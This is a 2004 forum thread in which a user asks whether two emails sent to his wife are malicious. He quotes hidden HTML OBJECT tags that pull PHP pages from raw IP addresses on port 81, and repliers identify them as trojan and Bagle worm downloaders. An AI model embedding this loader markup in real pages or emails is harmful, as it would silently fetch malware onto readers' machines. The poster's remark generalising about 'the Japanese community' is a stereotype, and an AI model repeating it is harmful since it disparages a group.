Malicious ActiveX?
|
Original Message
|
Name: Grover
Date: March 18, 2004 at 10:01:03 Pacific
Subject: Malicious ActiveX?
OS: Win XP Pro
CPU/Ram: CPU 2.4 GHz/512 MB
|
Comment: Someone sent my wife two curious e-mail messages. They displayed nothing because I have ActiveX turned off. The source revealed just: <html><body>
<OBJECT STYLE="display:none" DATA="http://68.112.62.74:81/433419.php">
</OBJECT></body></html>AND <html><body>
<OBJECT STYLE="display:none" DATA="http://68.107.23.153:81/713908.php">
</OBJECT></body></html>Is this potentially malicious? The way the From: fields were disguised makes me suspicious. Reverse DNS lookup revealed that one was sent from Vancouver where we live while the other was sent from Japan. The To: address gives us a huge clue as to who might have sent it. I'm just wondering what was the purpose? To damage her computer?
Report Offensive Message For Removal
|
|
Response Number 1
|
Name: peakinghard
Date: March 18, 2004 at 10:20:29 Pacific
|
Reply: (edit)
looking at the source of the 713908.php it does contain vbs scripting, it creates a file named sm.exe .. it could be spyware but it also could be a trojan of some sort
 Report Offensive Follow Up For Removal
|
|
Response Number 2
|
Name: blender
Date: March 18, 2004 at 10:38:52 Pacific
|
Reply: (edit)Hi I tried those links...(hta apps) 1st one is apparently infected with the vbs/psyme trojan according to mcafee. 2nd one...same trojan. Likely was not on purpose...the from addresses were likely spoofed... Not much info here but I didn't look hard either...at least you have a clue what might be going on. http://vil.nai.com/vil/content/v_100749.htm
________________________________________
I never give up!Windows Update
Report Offensive Follow Up For Removal
|
|
Response Number 3
|
Name: Grover
Date: March 18, 2004 at 11:41:43 Pacific
|
Reply: (edit)Thanks guys. I try to load it into my browser but I guess my security settings didn't allow it. Phew! We are pretty sure that it was on purpose simply because of the e-mail address it was sent to and the reverse DNS lookup narrows things quite a bit more. I can make conjecture about the individual but I can't be sure. My next step will be to search for the best method to contact the two service providers, see if I can get the individual's name and try to get them booted off the ISP. Failing that I'll send them a cease and desist order that ought to leave a brown spot in their shorts. If our reasoning is correct it seems like jealousy is the motivation. This kind of wiener behavior is apparently fairly common in the Japanese community. Thanks again. Cheers... Grover
Report Offensive Follow Up For Removal
|
|
Response Number 4
|
Name: DoveDude
Date: March 21, 2004 at 19:22:27 Pacific
|
Reply: (edit)This is a W32/Bagle.q@MM worm variant according to Network Associates, info found here : http://vil.nai.com/vil/content/v_101108.htm It is using port 81 to contact Internet loactions to download the code.
Report Offensive Follow Up For Removal
|
Use following form to reply to current message:
